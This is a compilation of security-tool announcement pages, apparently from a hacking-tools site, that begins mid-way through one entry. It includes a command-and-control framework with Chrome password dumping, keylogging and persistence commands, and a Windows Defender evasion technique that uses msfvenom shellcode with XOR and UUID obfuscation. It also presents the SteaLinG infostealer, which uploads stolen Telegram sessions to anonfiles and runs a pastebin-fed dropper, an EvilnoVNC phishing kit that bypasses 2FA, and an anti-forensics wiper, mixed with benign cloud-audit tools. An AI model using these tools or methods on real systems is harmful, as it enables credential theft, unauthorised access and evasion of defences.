===================================================================================================
env --> Checks Enviornment Variables
sc --> Lists All Services Running
user --> Current User
info --> Gives Us All Information About Compromised System
av --> Lists All antivirus In Compromised System

===================================================================================================
DATA EXFILTRATION COMMANDS:
===================================================================================================
download *file_name* --> Download Files From Compromised System
upload *file_name* --> Uploads Files To Victim Pc


===================================================================================================
EXPLOITATION COMMANDS:
========================================================== =========================================
persistence1 --> Persistance Via Method 1
persistence2 --> Persistance Via Method 2
get --> Download Files From Any URL
chrome_pass_dump --> Dump All Stored Passwords From Chrome Bowser
wifi_password --> Dump Passwords Of All Saved Wifi Networks
keylogger --> Starts Key Logging Via Keylogger
dump_keylogger --> Dump All Logs Done By Keylogger
python_install --> Installs Python In Victim Pc Without UI


Features Of Our Framework :-

Check The Video To Get A Detail Knowledge

1. The Payload.py is a FULLY UNDETECTABLE(FUD) use your own techniques for making an exe file. (Best Result When Backdoored With Some Other Legitimate Applictions)
2. Able to perform privilege escalation on any windows systems.
3. Fud keylogger
4. 2 ways of achieving persistance
5. Recon automation to save your time.

How To Use Our Tool :

git clone https://github.com/SaumyajeetDas/GodGenesis.git

pip3 install -r requirements.txt

python3 c2c.py

It is worth mentioning that Suman Chakraborty have contributed in the framework by coding the the the Fud Keyloger, Wifi Password Extraction and Chrome Password Dumper modules.

Dont Forget To Change The IP ADDRESS Manually in both c2c.py and payload.py



Matano - The Open-Source Security Lake Platform For AWS


Matano is an open source security lake platform for AWS. It lets you ingest petabytes of security and log data from various sources, store and query them in an open Apache Iceberg data lake, and create Python detections as code for realtime alerting. Matano is fully serverless and designed specifically for AWS and focuses on enabling high scale, low cost, and zero-ops. Matano deploys fully into your AWS account.


Features

Collect data from all your sources

Matano lets you collect log data from sources using S3 or SQS based ingestion.

Ingest, transform, normalize log data

Matano normalizes and transforms your data using Vector Remap Language (VRL). Matano works with the Elastic Common Schema (ECS) by default and you can define your own schema.

Store data in S3 object storage

Log data is always stored in S3 object storage, for cost effective, long term, durable storage.

Apache Iceberg Data lake

All data is ingested into an Apache Iceberg based data lake, allowing you to perform ACID transactions, time travel, and more on all your log data. Apache Iceberg is an open table format, so you always own your own data, with no vendor lock-in.

Serverless

Matano is a fully serverless platform, designed for zero-ops and unlimited elastic horizontal scaling.

Detections as code

Write Python detections to implement realtime alerting on your log data.

Installing

View the complete installation instructions.

You can install the matano CLI to deploy Matano into your AWS account, and manage your Matano deployment.

Requirements

  • Docker

Installation

Matano provides a nightly release with the latest prebuilt files to install the Matano CLI on GitHub. You can download and execute these files to install Matano.

For example, to install the Matano CLI for Linux, run:

curl -OL https://github.com/matanolabs/matano/releases/download/nightly/matano-linux-x64.sh
chmod +x matano-linux-x64.sh
sudo ./matano-linux-x64.sh

Getting started

Read the complete docs on getting started.

Deployment

To get started with Matano, run the matano init command. Make sure you have AWS credentials in your environment (or in an AWS CLI profile).

The interactive CLI wizard will walk you through getting started by generating an initial Matano directory for you, initializing your AWS account, and deploying Matano into your AWS account.


Initial deployment takes a few minutes.

Documentation

View our complete documentation.

License



FUD-UUID-Shellcode - Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness


Introduction

Another shellcode injection technique using C++ that attempts to bypass Windows Defender using XOR encryption sorcery and UUID strings madness :).


How it works

Shellcode generation

  • Firstly, generate a payload in binary format( using either CobaltStrike or msfvenom ) for instance, in msfvenom, you can do it like so( the payload I'm using is for illustration purposes, you can use whatever payload you want ):

    msfvenom -p windows/messagebox  -f raw -o shellcode.bin
  • Then convert the shellcode( in binary/raw format ) into a UUID string format using the Python3 script, bin_to_uuid.py:

    ./bin_to_uuid.py -p shellcode.bin > uuid.txt
  • xor encrypt the UUID strings in the uuid.txt using the Python3 script, xor_encryptor.py.

    ./xor_encryptor.py uuid.txt > xor_crypted_out.txt
  • Copy the C-style array in the file, xor_crypted_out.txt, and paste it in the C++ file as an array of unsigned char i.e. unsigned char payload[]{your_output_from_xor_crypted_out.txt}

Execution

This shellcode injection technique comprises the following subsequent steps:

  • First things first, it allocates virtual memory for payload execution and residence via VirtualAlloc
  • It xor decrypts the payload using the xor key value
  • Uses UuidFromStringA to convert UUID strings into their binary representation and store them in the previously allocated memory. This is used to avoid the usage of suspicious APIs like WriteProcessMemory or memcpy.
  • Use EnumChildWindows to execute the payload previously loaded into memory( in step 1 )

What makes it unique?

  • It doesn't use standard functions like memcpy or WriteProcessMemory which are known to raise alarms to AVs/EDRs, this program uses the Windows API function called UuidFromStringA which can be used to decode data as well as write it to memory( Isn't that great folks? And please don't say "NO!" :) ).
  • It uses the function call obfuscation trick to call the Windows API functions
  • Lastly, because it looks unique :) ( Isn't it? :) )

Important

  • You have to change the xor key(row 86) to what you wish. This can be done in the ./xor_encryptor.py python3 script by changing the KEY variable.
  • You have to change the default executable filename value(row 90) to your filename.
  • The command for compiling is provided in the C++ file( around the top ). NB: mingw was used but you can use whichever compiler you prefer. :)

Compile

make

Proof-of-Concept( PoC )

Static Analysis

AV Scan results

The binary was scanned using antiscan.me on 01/08/2022.

Credits

https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/



SteaLinG - Open-Source Penetration Testing Framework Designed For Social Engineering


The SteaLinG is an open-source penetration testing framework designed for social engineering After the hack, you can upload it to the victim's device and run it

disclaimers:

This is only for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes

How can I benefit from this project?

  • you can use it
  • for developers
    you can read the source code and try to understand how to make a project like this

Features


module Short description
Dump password steal All passwords saved , upload file a passwords saved to mega
Dump History dump browser history
dump files Steal files from the hard drive with the extension you want

New features

module Short description
1-Telegram Session Hijack Telegram session hijacker
  • How it works ? The recording session in Telegram is stored locally in this particular path C:\Users<pc name >\AppData\Roaming\Telegram Desktop in the 'tedata' folder
C:
└── Users
├── .AppData
│   └── Roaming
│   └── TelegramDesktop
│   └── tdata

Once you have moved this folder with all its contents on your device in the same path, then you do what will happen for it is that simple The tool does all this, all you have to do is give it your token on the site https://anonfiles.com/ The first step is to go to the path where the tdata file is located, and then convert it to a zip file. Of course, if the Telegram was working, this would not happen. If there was any error, it means that the Telegram is open, so I would do the kill processes. antivirus You will see that this is malicious behavior, so I avoided this part at all by the try and except in the code The name of the archive file is used in the name of the device of your victim, because if you have more than one, I mean, after that, you will post request for the zipfile on the anonfiles website using the API key or the token of your account on the site. On it, you will find your token Just that, teacher, and it is not exposed from any AV

module
2- Dropper
  • What requirements does he need from you?
  • And how does it work?? Requirements The first thing it asks you is the URL of the virus or whatever you want to download to the victim's device, but keep in mind that the URL must be direct, meaning that it must be the end Its Yama .exe or .png, whatever is important is that it be a link that ends with a backstamp The second thing is to take the API Kay from you, and you will answer it as well. Either you register, click on the word API, you will find it, and you will take the username and password So how does it work? 

The first thing is to create a paste on the site and make it private Then it adds the url you gave it and then it gives you the exe file, its function is that when it works on any device it starts adding itself to Registry device in two different ways It starts to open pastebin and inserts the special paste you created, takes the paste url, downloads its content and runs And you can enter the url at any time and put another url. It is very normal because the dropper goes every 10 minutes. Checks the URL. If it finds it, it changes it, downloads its content, downloads it, and connects to find it. You don't do anything, and so, every 10 minutes, you can literally do it, you can access your device from anywhere

3- Linux support

4-You can now choose between Mega or Pastebin

Requirements

  • python >= 3.8 ++ Download Python
  • os : Windows
  • os : Linux

Installation to Windows:

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
pip install -r requirements.txt
python SteaLinG.py

Installation to Linux

git clone https://github.com/De3vil/SteaLinG.git
cd SteaLinG
chmod +x linux_setup.sh
bash linux_setup.sh
python SteaLinG.py

warning:

* Don't Upload in VirusTotal.com Bcz This tool will not work with Time.
* Virustotal Share Signatures With AV Comapnies.
* Again Don't be an Idiot!

AV detection


Media



Monkey365 - Tool For Security Consultants To Easily Conduct Not Only Microsoft 365, But Also Azure Subscriptions And Azure Active Directory Security Configuration Reviews


Monkey365 is an Open Source security tool that can be used to easily conduct not only Microsoft 365, but also Azure subscriptions and Azure Active Directory security configuration reviews without the significant overhead of learning tool APIs or complex admin panels from the start. To help with this effort, Monkey365 also provides several ways to identify security gaps in the desired tenant setup and configuration. Monkey365 provides valuable recommendations on how to best configure those settings to get the most out of your Microsoft 365 tenant or Azure subscription.


Introduction

Monkey365 is a plugin-based PowerShell module that can be used to review the security posture of your cloud environment. With Monkey365 you can scan for potential misconfigurations and security issues in public cloud accounts according to security best practices and compliance standards, across Azure, Azure AD, and Microsoft365 core applications.

Installation

You can either download the latest zip by clicking this link or download Monkey365 by cloning the repository:

Once downloaded, you must extract the file and extract the files to a suitable directory. Once you have unzipped the zip file, you can use the PowerShell V3 Unblock-File cmdlet to unblock files:

Get-ChildItem -Recurse c:\monkey365 | Unblock-File

Once you have installed the monkey365 module on your system, you will likely want to import the module with the Import-Module cmdlet. Assuming that Monkey365 is located in the PSModulePath, PowerShell would load monkey365 into active memory:

Import-Module monkey365

If Monkey365 is not located on a PSModulePath path, you can use an explicit path to import:

Import-Module C:\temp\monkey365

You can also use the Force parameter in case you want to reimport the Monkey365 module into the same session

Import-Module C:\temp\monkey365 -Force

Basic Usage

The following command will provide the list of available command line options:

Get-Help Invoke-Monkey365

To get a list of examples use:

Get-Help Invoke-Monkey365 -Examples

To get a list of all options and examples with detailed info use:

Get-Help Invoke-Monkey365 -Detailed

The following example will retrieve data and metadata from Azure AD and SharePoint Online and then print results. If credentials are not supplied, Monkey365 will prompt for credentials.

$param = @{
Instance = 'Microsoft365';
Analysis = 'SharePointOnline';
PromptBehavior = 'SelectAccount';
IncludeAzureActiveDirectory = $true;
ExportTo = 'PRINT';
}
$assets = Invoke-Monkey365 @param

Regulatory compliance checks

Monkey365 helps streamline the process of performing not only Microsoft 365, but also Azure subscriptions and Azure Active Directory Security Reviews.

160+ checks covering industry defined security best practices for Microsoft 365, Azure and Azure Active Directory.

Monkey365 will help consultants to assess cloud environment and to analyze the risk factors according to controls and best practices. The report will contain structured data for quick checking and verification of the results.

Supported standards

By default, the HTML report shows you the CIS (Center for Internet Security) Benchmark. The CIS Benchmarks for Azure and Microsoft 365 are guidelines for security and compliance best practices.

The following standards are supported by Monkey365:

  • CIS Microsoft Azure Foundations Benchmark v1.4.0
  • CIS Microsoft 365 Foundations Benchmark v1.4.0

More standards will be added in next releases (NIST, HIPAA, GDPR, PCI-DSS, etc..) as they are available.

Additional information such as Installation or advanced usage can be found in the following link



HSTP - Simple Hyper Service Transfer Protocol On Networks



The protocol aims to develop a application layer abstraction for the Hyper Service Transfer Protocol.

HSTP is a recursion as nature of HSTP. This protocol implements itself as a interface. On every internet connected device, there is a HSTP instance. That's why the adoption is not needed. HSTP already running top of the internet. We have just now achieved to explain the protocol over protocols on heterogeneous networks. That's why do not compare with web2, web3 or vice versa.

Abstract

HSTP is a application representation interface for heterogeneous networks.

HSTP interface enforces to implement a set of methods to be able to communicate with other nodes in the network. Thus serves, clients, and other nodes can communicate with each other with trust based, end to end encrypted way. By the time the node resolution is based on fastest path resolution algorithm I wrote.


Protocol 4 Babies

Story time!

  • Baby crying!
  • Needs milk!
  • Mommy has a problem.
  • Father has a problem.
  • Let's fix this!

A small overview

Think about, we're in the situation of one mother and one father lives a happy life. They had a baby! Suddenly, the mother needed to drink pills regularly to cure a disase. The pill is a poison for the baby. The baby is crying and the mother calls father because he is the only trusted person to help the baby. But the father sometime can not stay at home, he needs to do something to feed the baby. Father heard one milkman has fresh and high quality milks for low price. Father decides to try to talk the milkman, milkman deliver the milk to the father, father carry the milk to the mother. Mother give the milk to the baby. Baby is happy now and the baby sleeps, mother see the baby is happy.

The family never buy the milk from outside, this is the first time they buy milk for the baby: (Mom do not know the number of milkman, milkman do not know the home address)

As steps:

0) - Baby wants to drink milk.
1) - Baby cries to the mom.
3) - Mom see the baby is crying.
4) - Mom checks the fridge. Mom sees the milk is empty. (Mother is only trusting the Father)
5) - Mom calls the father.
6) - Father calls the milkman.
7) - Milkman delivers the milk to father.
8) - Father delivers the milk to mom.
9) - Mom gives the milk to the baby.
10) - Baby drinks the milk.
11) - Baby is happy.
12) - Baby sleeps.
13) - Mother see the baby is happy and sleeps.
14) - In order to be able to contact the milkman again, the mother asks the father to tell her that she wants the milkman to save the address of the house and the mobile phone of the mother.
15) - Mother calls the father.
16) - Father calls the milkman.
17) - Milkman saves the address of the house and the mobile phone of the mother.

Oops, tomorrow baby wakes up and cries again,
0) - Baby wants to drink milk.
1) - Baby cries to the mom.
2) - Mom see the baby is crying.
3) - Mom checks the fridge. Mom sees the milk is empty. (Mother is trusting the Father had right decision in the first place by giving the address to the milkman, and the milkman had right decision in the first place by saving the address of the house and the mobile phone of the mother.)
4) - Mother calls the milkman (Mother is trusting the Father's decision only)
5) - Milkman delivers the milk to mom.
6) - Mom gives the milk to the baby.
7) - Baby drinks the milk.
8) - Baby is happy.
9) - Baby sleeps.
10) - Mother see the baby is happy and sleeps.
11) - Mother is happy and the mother trust the milkman now.

this document you're reading is a manifest for the internet people to connecting the other people by trusting the service serve the client and the trust only can be maintainable by providing good services. trust is the key, but not enough for survive. the service has to be reliable, consistent, cheap. unless the people will decide to not ask from you again.

So, it's easy right? It's so simple to understand, who are those people in the story?

  • Baby is a client.
  • Mom is a client.
  • Father is a client.
  • Milkman is a server.

also,

  • Baby could be a server in [TIME].
  • Mom is a server for baby.
  • Father is a server for mom.
  • Milkman is a server for father.
  • Milkman is a server for mom.

Baby is in trusted hands. Nothing to worry about. They love you, you will understand when you grow up and have a child.

// Technical step explanation soon, but not that hard as you see.

What is a HSTP?

HSTP is a interface, which is a set of methods that must be implemented by the application layer. The interface is used to communicate with other nodes in the network. The interface is designed to be used in a heterogeneous network.

What is a HSTP node?

HSTP shall be implemented on any layer of network connected devices/environment.

HSTP node could be a TCP server, HTTP server, static file or contract in any chain. One HSTP node is able to call any other HSTP node. Thus the nodes can call each other freely, they can check their system status, and they can communicate with each other.

What kind of abstraction layer for networks?

HSTP is already implemented on language level, by people for people. English is mostly adopted language around the Earth. JavaScript could be known also mostly adopted language for browser environments. Solidity is for EVM-based chains, hyperbees for TCP based networks, etc.

HSTP interface shall be applied between any HSTP connected devices/networks.

  • [Universe] talks to [Universe] via [HSTP]
    • [Kind] universe talks over world.
      • [World] Earth talks with sound frequencies and HSTP.
        • [Country] X sound frequencies on Xish and HSTP.
          • [Community] CommunityX Xish on CommunityXish.
        • [Country] Y talks Yish and HSTP.
        • [Country] Z talks Zish and HSTP.
      • [World] Mars talks with radio frequencies.
        • [Bacteria] UUU-1 talks UUU-1ish and HSTP.
          • Info: UUU-1 can call, universe/kind/world/Earth/X/CommunityX/query
      • [World] Jupiter talks with light frequencies and do not implements HSTP.
        • Info: If the Earth wants to talk with Jupiter, we can add one HSTP to Jupiter proxy on universe.
    • [Kind] universe talks over atoms and HSTP.
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query
      • [Atoms] ... and HSTP.
        • ... and HSTP.
          • [Y] ... and HSTP.
            • Info: [Y] can talk with universe/kind/world/Mars/Bacteria/UUU-1/query Info: Kind universe can talk with Mars, and Mars also can talk with Kind universe.

What is the purpose of HSTP?

Infinitive scaling options: Any TCP connected device can talk with any other TCP connected device over HSTP. That means any web browser is serve of another HSTP node, and any web browser can call any other web browser.

Uniform application representation interface: HSTP is a uniform interface, which is a set of methods that must be implemented by the application layer.

Heterogeneous networks: Any participant of network is allowing to share the resources with other participants of the network. The resources can be CPU, memory, storage, network, etc.

Conjucation of web versions Since the blockchain technologies calling as web3, people started discussing about the differanciates between the web's. Comparing is a behaviour for incremental numeric system education's mindset. Which one is better: none of them. We have to build systems could talk in one uniform protocol, underneath services could be anything. HSTP is aiming for that.

What are the components of HSTP?

Registry interface Registry interface designed for using on TCP layer, to be able to register top level tld nodes in the network. The first implementation of HSTP TCP relay will resolve hstp/

The registry has two parts of the interface:

  • Register method, which is used to register a new node in the network.
  • Resolve method, which is used to resolve a node in the network.

Registry implementation needs two HSTP node,

  1. Hyperbees
  • Heterogen networks will resolve the registry of RPC, TCP, HTTP, HSTP etc.
  1. Registry.sol on any EVM based chain. (Ethereum, Binance Smart Chain, Polygon, etc.)
  • Registry.sol will resolve the registry of HSTP nodes. That can be relayed over another networks.

Router interface

For demonstration purposes, we will use the following solidity example:

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./HSTP.sol";
import "./ERC165.sol";

enum Operation {
Query,
Mutation
}

struct Response {
uint256 status;
string body;
}

struct Registry {
HSTP resolver;
}

// HSTP/Router.sol
abstract contract Router is ERC165 {
event Log(address indexed sender, Operation operation, bytes payload);
event Register(address indexed sender, Registry registry);
mapping(string => Registry) public routes;

function reply(string memory name, Operation _operation, bytes memory payload) public virtual payable returns(Response memory response) {
emit Log(msg.sender, _operation, payload);
// Traverse upwards and downwards of the tree.
// Tries to find the closest path for given operation.
// If the route is registered on HSTP node, reply from children node.
// If the node do not have the route on this node, ask for parent.
if (routes[name]) {
if (_operation == Operation.Query) {
return this.query(payload);
} else if (_operation == Operation.Mutation) {
return this.mutation(payload);
}
}
return super.reply(name, _operation, payload);
}

function query(string memory name, bytes memory payload) public view returns (Response memory) {
return routes[name].resolver.query(payload);
}

function mutation(string memory name, bytes memory payload) public payable returns (Response memory) {
return routes[name].resolver.mutation(payload);
}

function register(string memory name, HSTP node) public {
Registry memory registry = Registry({
resolver: node
});
emit Register(msg.sender, registry);
routes[name] = registry;
}

function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
return interfaceId == type(HSTP).interfaceId;
}
}

HSTP interface

// SPDX-License-Identifier: GNU-3.0-or-later
pragma solidity ^0.8.0;

import "./Router.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
// Will implement: EIP-4337 when it's on final stage.
// https://github.com/ethereum/EIPs/blob/master/EIPS/eip-4337.md
abstract contract HSTP is Router {
constructor(string memory name) {
register(name, this);
}

function query(bytes memory payload)
public
view
virtual
returns (Response memory);

function mutation(bytes memory payload)
public
payable
virtual
returns (Response memory);
}

Example HSTP Node

HSTP node has access to call parent router by super.reply(name, operation, payload) method. HSTP node can also call children nodes by calling this.query(payload) or this.mutation(payload) methods.

A HSTP node can be a smart contract, or a web browser, or a TCP connected device.

Node has full capability of adding more HSTP nodes to the network or itself as sub services.

      HSTP  HSTP
/ \ / \
HSTP HSTP HSTP
/ \
HSTP HSTP
/ /
HSTP HSTP
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

struct ITodo {
string todo;
}

function addTodo(ITodo memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}

// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}

function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(ITodo memory request) = abi.decode(payload, (ITodo));
return this.addTodo(request);
}
}</ code>

Proposal

Ethereum proposal is draft now, but the protocol has referance implementation Todo.sol.

Awesome web services running top of HSTP

Full list here

Hello world

You can test the HSTP and try on remix now.

How to play with the protocol?

  • Copy the source code below to the https://remix.ethereum.org/
  • Deploy on any EVM based chain.
  • Call the functions and try different network topologies on HSTP.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;

import "hstp/HSTP.sol";

// Stateless Hyper Service Transfer Protocol for on-chain services.
contract Todo is HSTP("Todo") {

struct TodoRequest {
string todo;
}

function addTodo(TodoRequest memory request) public payable returns(Response memory response) {
response.body = request.todo;
return response;
}

// Override for HSTP.
function query(bytes memory payload)
public
view
virtual
override
returns (Response memory) {}

function mutation(bytes memory payload)
public
payable
virtual
override
returns (Response memory) {
(TodoRequest memory todoRequest) = abi.decode(payload, (TodoRequest));
return this.addTodo(tod oRequest);
}
}

Contribute:

Developer level contribution

  • Write a todo application with HSTP, deploy with remix and test it.
  • Draw example architecture of HSTP (serviceless architecture).

Core level contribution

  • Implement TCP layer HSTP interface on hyperbees, [Universe]
    • hyperbees and HSTP will be the first implementation of HSTP.
    • That will covers the universe phrase of networks. That will bring us full decentralized web on HSTP.
  • Implement RPC layer HSTP interface on Solidity [Web3]
  • Implement complex serviceless architecture on HSTP interface with Solidity [Web3]
  • Implement HTTP layer HSTP interface on JavaScript [Web]

Inspirations:

License

GNU GENERAL PUBLIC LICENSE V3

Core Contributors

Author

Cagatay Cali



EvilnoVNC - Ready To Go Phishing Platform


EvilnoVNC is a Ready to go Phishing Platform.

Unlike other phishing techniques, EvilnoVNC allows 2FA bypassing by using a real browser over a noVNC connection.

In addition, this tool allows us to see in real time all of the victim's actions, access to their downloaded files and the entire browser profile, including cookies, saved passwords, browsing history and much more.


Requirements

  • Docker
  • Chromium

Download

It's recommended to clone the complete repository or download the zip file.
Additionally, it's necessary to build Docker manually. You can do this by running the following commands:

git clone https://github.com/JoelGMSec/EvilnoVNC
cd EvilnoVNC ; sudo chown -R 103 Downloads
sudo docker build -t joelgmsec/evilnovnc .

Usage

./start.sh -h

_____ _ _ __ ___ _ ____
| ____|_ _(_) |_ __ __\ \ / / \ | |/ ___|
| _| \ \ / / | | '_ \ / _ \ \ / /| \| | |
| |___ \ V /| | | | | | (_) \ V / | |\ | |___
|_____| \_/ |_|_|_| |_|\___/ \_/ |_| \_|\____|

---------------- by @JoelGMSec --------------

Usage: ./start.sh $resolution $url

Examples:
1280x720 16bits: ./start.sh 1280x720x16 http://example.com
1280x720 24bits: ./start.sh 1280x720x24 http://example.com
1920x1080 16bits: ./start.sh 1920x1080x16 http://example.com
1920x1080 24bits: ./start.sh 1920x1080x24 http://example.com

The detailed guide of use can be found at the following link:

https://darkbyte.net/robando-sesiones-y-bypasseando-2fa-con-evilnovnc

Features & To Do

  • Export Evil-Chromium profile to host
  • Save download files on host
  • Disable parameters in URL (like password)
  • Disable key combinations (like Alt+1 or Ctrl+S)
  • Disable access to Thunar
  • Decrypt cookies in real time
  • Expand cookie life to 99999999999999999
  • Dynamic title from original website
  • Dynamic resolution from preload page
  • Replicate real user-agent and other stuff
  • Basic keylogger

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

Original idea by @mrd0x: https://mrd0x.com/bypass-2fa-using-novnc
This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



AoratosWin - A Tool That Removes Traces Of Executed Applications On Windows OS

AoratosWin is a tool that removes traces of executed applications on Windows OS which can easily be listed with tools such as ExecutedProgramList by Nirsoft.

(Feel free to decompile, reverse, redistribute, etc.)


Supported OS (Tested On)

  • Windows 7 (x86, x64)
  • Windows 8 (x86, x64)
  • Windows 8.1 (x86, x64)
  • Windows 10 (x86, x64)
  • Windows 11 (x64)

Minimum System Reqs:

  • .NET Framework 4.0

Disclaimer

Any actions and/or activities related to this tool is solely your responsibility.



Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • What roles trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but it's purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka, objective based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider CloudFox Commands
AWS 15
Azure 2 (alpha)
GCP Support Planned
Kubernetes Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with one recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, Sagemaker are supported. If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec:RunInstance but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should also always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of size of the account and preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using use cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. If gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors if you don't have permissions to make calls that CloudFox is making. Either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs. Or, it might be an SCP that is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Parrot 5.1 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind

Parrot OS 5.1 is officially released. We're proud to say that the new version of Parrot OS 5.1 is available for download; this new version includes a lot of improvements and updates that makes the distribution more performing and more secure.

How do I get Parrot OS?

You can download Parrot OS by clicking here and, as always, we invite you to never trust third part and unofficial sources.

If you need any help or in case the direct downloads don't work for you, we also provide official Torrent files, which can circumvent firewalls and network restrictions in most cases.

How do I upgrade from a previous version?

First of all, we always suggest to update your version for being sure that is stable and functional. You can upgrade an existing system via APT using one of the following commands:

  • sudo parrot-upgrade

or

  • sudo apt update && sudo apt full-upgrade

